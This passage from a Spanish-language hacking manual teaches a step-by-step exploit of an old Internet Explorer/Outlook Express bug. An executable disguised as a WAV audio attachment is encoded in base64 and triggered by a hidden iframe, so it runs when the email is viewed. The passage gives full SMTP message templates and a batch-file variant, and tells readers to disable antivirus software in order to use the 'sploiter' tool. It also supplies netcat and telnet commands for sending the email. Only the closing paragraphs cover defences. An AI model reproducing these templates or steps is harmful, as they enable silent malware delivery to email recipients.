que se tiene que ejecutar, es decir, un archivo binario, por ejemplo algo.exe, y como no
podemos poner directamente el contenido del archivo .exe dentro de una web o un e-mail, se
transforma en un formato especial llamado base64, que es como si se convirtiese el archivo
binario a letras y números para que se pueda ejecutar directamente cuando el usuario vea la
página o el correo.

Si no entiendes bien lo de base64, lo comprendo, al principio todo cuesta, prueba lo siguiente:

C:\>type C:\winnt\system32\cmd.exe ó cualquier otro fichero.exe

¿Qué pasó?, pues que en el mejor de los casos verás simbolitos, caritas y demás caracteres
“raros”, claro, los archivos .exe, .com y otros muchos no se pueden “ver” sin más.

Ahora prueba esto:

C:\>type c:\autoexec.bat

¿Qué paso?, pues que el contenido de este archivo si es “legible” directamente (otra cosa es que
no comprendas su contenido), pero que se visualiza bien, está claro.

Ambos archivos son ejecutables por el PC, el primero no se puede editar y el otro si, pues esto mismo
le pasaría a nuestra página web o e-mail. Si incluyéramos un archivo binario directamente dentro de la
página, HTML no podría “traducirlo” y mostraría datos incomprensibles, si conseguimos “traducir” el
mismo archivo a base64, HTML podría ejecutarlo normalmente. Espero haber aclarado las dudas, me ha
costado....

Escribir un archivo ejecutable en base64 dentro de una página web o un correo es lo que se le llama
empaquetar un archivo, te advierto, más adelante en otros capítulos, también se hablará de empaquetar
archivos ejecutables, no será lo mismo, será otra cosa, por ejemplo “unir” dos .exe en uno sólo o
camuflar un .exe dentro de una imagen, a esto también se le llama a veces empaquetar archivos, intentaré
diferenciar las cosas cuando llegue el momento....

Resumiendo:

El bug consiste en empaquetar un archivo ejecutable .exe en base64 y dárselo a Internet

Explorer o a Outlook Express, haciéndoles creer que se trata de un archivo de audio .Wav . Si
te llego a decir nada más que esto al principio seguro que no hubieras entendido nada.

Necesitamos:

Un archivo .exe que hay que empaquetar

Un “empaquetador”
Enviar el correo o diseñar una página que use el archivo empaquetado.

Tenemos:

Nuestro “sufrido” archivo calc.exe (puede ser otro cualquiera, tu eliges)

El mismísimo Outlook nos podría servir con algo de astucia. Usaremos sploiter.
Nuestra habilidad para incitar al usuario que visite esa página o vea el correo.

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 69
 Foro de HackXcrack

Incluir el contenido de todo el mensaje a enviar puede ser una tarea de “chinos”, a continuación te pongo
un extracto del mismo, en negrita está aquello que debes modificar o que tiene especial importancia:

Helo localhost
mail from:<quien_escribe@ntm.es>
rcpt to:<quien_lo_recibe@ntm.es>
data
from:quien_escribe@ntm.es
Subject:La importancia de saber sumar y restar.
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
Haber si va.<BR>
</BODY>
</HTML>
--2--
--1
Content-Type: audio/x-wav;
name="calc.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNh
bm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD+BWYpumQIerpkCHq6Z
Ah60HgKeq9kCHrjRxt6t2QIerpkCXrbZAh6umQI…………………….
……………………………………………………………………………………………………
………
.
quit

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 70
 Foro de HackXcrack

No me digas más, no te enteras de nada, pues a explicar te toca:

Helo localhost
mail from:<quien_escribe@ntm.es>
rcpt to:<quien_lo_recibe@ntm.es>
data
from:quien_escribe@ntm.es
Subject:La importancia de saber sumar y restar.
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
De todo esto espero que no necesites mucha más explicación que de:
Content-Type: multipart/related
Content-Type: “multipart/alternative”
Y eso de boundary = “1” ó boundary =”2”....

Menos mal que no se me ocurrió explicar los contenidos MIME al principio, ¿Recuerdas...?

Te lo cuento en tres líneas:

Son las partes MIME que debe componer Outlook /IE al recibir los contenidos, así cuando,
encuentra Boundary=”1”, lee lo que empieza por --1, y sucesivamente, cada parte MIME
incluye o puede incluir el juego de caracteres a usar, la codificación usada (pe. Base64), etc.

No le prestes mayor atención, espero que a nadie se le ocurra ponerse a escribir correos con partes
MIME a mano, para eso ya tenemos Outlook, poco a poco irás comprendiendo...

Lo que viene a continuación sí es importante que lo entiendas, porque es parte del BUG:

--2
<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
A ver si va.<BR>
</BODY>
</HTML>
--2

He resaltado lo importante, lo que no debe faltar, de lo demás, ya sabes: te creas una web bonita o un
correo llamativo y lo pones, o simplemente lo dejas como está, y el usuario lo único que verá es: “A ver si
va”.

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 71
 Foro de HackXcrack

Fíjate bien en la línea <iframe>, te lo traduzco “en cristiano” por si no sabes nada de HTML:

Cuando se acceda al correo se entregará al usuario lo que pone en iframe, esto es THE-CID, que
si te fijas un poco más abajo, se trata de una parte MIME, que a su vez, es el archivo ejecutable
en formato base64. O sea, QUE SE EJECUTA lo que diga THE-CID
Después viene:

--1
Content-Type: audio/x-wav;
name="calc.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNh
bm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD+BWYpumQIerpkCHq6Z
Ah60HgKeq9kCHrjRxt6t2QIerpkCXrbZAh6umQI………………………………………………
…………………………………………………………………………
--1

Todo esto pertenece al contenido del supuesto archivo de audio, codificado en base64 cuyo
identificador en la parte MIME es THE-CID, es decir, a lo que llama la línea <iframe > de antes para
que se ejecute, no lo he puesto entero porque es excesivamente largo, aparte que todo ese “chorizo” de
letras y números es incomprensible para nosotros.

Una puntualización, no es preciso que el archivo este codificado en base64, ¡PERO SI ME HABIAS
DICHO QUE SÍ!, ¡¡ACLARATE!!

Vamos a ver, si lo que quiero que se ejecute es un archivo binario, sí debe estar codificado en base64,
por ejemplo nuestro calc.exe, pero también puedo poner órdenes de la consola de comandos en texto
claro, por ejemplo:
--1
Content-Type: audio/x-wav;
name="MIRA.BAT"
Content-Transfer-Encoding:quoted-printable
Content-ID: <THE-CID>
Echo OFF
Dir C:\/S/P
Echo Lo ejecuté, JA, JA, JA.
Pause

--1

Solo he marcado en negrita los cambios con respecto al anterior, observa que ya no es necesaria la línea
de codificación base64, puesto que lo que se va a ejecutar son instrucciones del propio Sistema
Operativo.

Por último tenemos:

.
quit

Sin comentarios.

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 72
 Foro de HackXcrack

Todo esto es confuso y algo complicado al principio, pero estúdialo, léelo 200 veces si es preciso, tu
misión es ENTENDER.

Y para finalizar esta práctica,

¿Cómo se puede empaquetar archivos para enviarlos codificados en base64?

Sugerencias:

1º) Elegimos el archivo que queremos enviar, preparamos un correo convencional usando
Outlook, y nos lo enviamos a nosotros mismos adjuntando el archivo, sí, sí, como fichero
adjunto.

Cuando recibamos nuestro propio correo, abrimos el código fuente y veremos que el
archivo adjunto ya está codificado en base64, lo copiamos y lo pegamos en nuestro correo
malicioso después de la línea Content-ID: <THE-CID> y ya está.

Claro, todo lo demás lo debes escribir.

2º) Usamos herramientas tipo wincode o mpack. Sin comentarios

3º) Usamos el “programita” sploiter.exe que comenté anteriormente.

Voy a explicarlo usando sploiter.exe, porque está “pensado” para poner TODO, incluidas todas las partes
MIME necesarias, sólo faltaría incluir a quién va dirigido y quién lo envía, “chupao” ¿no?

Una advertencia, si tienes instalado algún antivirus o antitroyano, cuando descomprimas el archivo
sploiter.zip te informará de que el archivo.... tiene el virus Troyan.Horse....., NI CASO, no tiene ningún
virus, por lo menos el que te entrego, lo que ocurre es que Norton (es el que yo uso) interpreta este
fichero como un troyano y piensa que lo es. TRANQUILO y desactiva el antivirus, después de generar el
mensaje lo vuelves a activar y punto.

Apenas si debería de explicar nada:

Pulsa en Encode y selecciona el archivo.exe que quieras empaquetar

Pulsa en Advanced y “mira” que se ha generado TODO el código necesario.

Por último Pulsas en Save y le das un nombre, por ejemplo calcula.txt

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 73
 Foro de HackXcrack

Ahora abre el archivo calcula.txt y añade estas líneas al principio, si lo deseas modifica también la
cabecera From:<xxxx> que puso el programa sploiter y la cambias por la dirección del remitente,
quedaría más o menos así:

Helo localhost
Mail From:nombre@quienloenvia.com
Rcpt to:nombre@quienlorecive.com
Data
From: nombre@quienloenvia.com

Al final del archivo añade las líneas,

.
quit

La extensión por defecto de este tipo de archivos es *.eml, que es el formato que reconoce Outlook para
enviar-recibir los correos, si lo salvas con esa extensión en el momento que selecciones el archivo
calcula.eml SE EJECUTARÁ, si se hubiese tratado de un virus tú mismo PC habría quedado infectado,
por eso es mejor salvarlo en formato .txt

Para enviarlo, como en la práctica anterior:

C:\>type calcula.txt | nc –vv –i 25 servidor.smtp.com 25

Sustituye el nombre de archivo, ruta y nombre del servidor smtp que uses.

A veces y debido al tamaño del correo, netcat puede tardar mucho, muchísimo en canalizar el archivo y
enviarlo al servidor, así que te voy a dar un truco:

Abre el archivo calcula.txt, selecciona TODO y cópialo (botón derecho-copiar)

Abre una ventana de comandos y escribe:

C: \>telnet servidor.smtp.com 25 (pon el nombre del servidor que uses)

Una vez se haya establecido la conexión con el servidor, pega en esa ventana de
comandos el contenido del archivo calcula.txt, CUIDADO: En la ventana de comandos
no puedes utilizar ctrl.+v, basta con que pulses el botón derecho del ratón y SE
PEGARÁ TODO, sólo con un clic.

CONSEJO

Si lo envías de este modo (te lo aconsejo porque siempre me ha funcionado) NO

.
AÑADAS al final del fichero el punto ( ) y la orden quit, lo harás cuando termine de
“pegar” el archivo en la ventana de telnet. No conozco muy bien el motivo del por qué
ocurre esto pero imagino que tiene que ver con la velocidad con la que se envía el
mensaje y su tamaño, si pusiste estas líneas en el archivo calcula.txt, bórralas antes de
enviar el archivo mediante la opción de copiar y pegar en la consola de comandos, una
vez haya terminado de enviar el mensaje, hazlo manualmente.

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 74
 Foro de HackXcrack

Cuando el destinatario reciba el correo y lo visualice o lo abra, verá “fugazmente” la ventana que aparece
habitualmente cuando se descarga un archivo, pero NO LE PEDIRÁ si desea descargarlo o no,
simplemente se instalará en su PC y se ejecutará.

Ahora te toca a ti: ¿Dónde se guarda el archivo que se descarga? ¿Qué pasa si ese archivo ya existe? ¿Qué
permisos NTFS toma el archivo?.

Un momento, hay una cosa que no entiendo, ¿No habías dicho que este bug sólo ejecutaba el archivo
empaquetado? ¿De verdad que se instala en el ordenador remoto?

Pues SÍ. Se instala, si ya existe un archivo con ese nombre no dice nada..., simplemente crea otra copia
del mismo archivo con el nombre archivo(1).exe, en el caso nuestro archivo calc.exe, creará otro archivo
llamado calc(1).exe, si ya existe éste otro, creará otro nuevo llamado calc(2).exe y así sucesivamente.

Y MAS, realmente crea dos archivos por cada vez que se visualiza el correo o se accede a la página web,
¿Quieres caldo? Pues toma dos tazas. Si visualizas 10 veces el correo, se crearán 20 archivos.

¿Dónde se crean? Pues en la carpeta predefinida para la descarga de archivos por Windows, si hablamos
de Windows 2000, lo guarda en:

C:\Documents and Settings\nombre_de_usuario\Configuración Local\Temp.

Luego por tanto, el archivo descargado y ejecutado “maliciosamente” toma los permisos y los privilegios
del usuario que leyó el correo, si se tratase del administrador del sistema, se ejecutaría con permisos
de Administrador y se guardaría en:

C:\Documents and Settings\Administrador\Configuración Local\Temp.

Puede que ahora empieces a entender lo pesado que me he puesto durante todas estas páginas al decir:

“Nunca uses la cuenta de Administrador para navegar por Internet o Leer el correo”

Si en lugar del inofensivo archivo calc.exe se hubiese tratado de un virus o de una secuencia de
órdenes que borraran archivos, formatearan un disco o vete a saber que malas intenciones se nos
pueden ocurrir, al ejecutar ese archivo con “los poderes” del administrador el asunto habría sido
devastador y con algo de habilidad, SIN SOLUCIÓN E IRRECUPERABLE

En el caso de W9X y ME, se guardaría en la carpeta C:\Temp., volvemos otra vez a lo importante que es
conocer la versión y el tipo de Sistema Operativo de la máquina objetivo.

¿Qué podemos hacer para evitarlo?

Además de aplicar todos los consejos que te he ido dando en esta práctica y en anteriores, Establece las
Zonas de Seguridad apropiadas para Internet Explorer y Outlook Express (como ves es muy
importante y NADIE lo hace), si usas Windows 2000 instala Service Pack 2 YA, pero no te fíes, no
resuelve el problema, simplemente preguntará si deseas descargar o no el archivo, la decisión es del
usuario, como digas que Sí ...

En W9X, ME y XP hay que buscar el horfixed apropiado, está catalogado con el identificador 2424,
Microsoft siempre tan explícito y transparente.

Otra solución es impedir la descarga de archivos dentro de las zonas de seguridad y no es una buena
solución, sobretodo si utilizamos Internet precisamente para eso, descargar archivos.

Manual del Novato Por HxC Mods-Adm

Desarrollo de Prácticas
Página: 75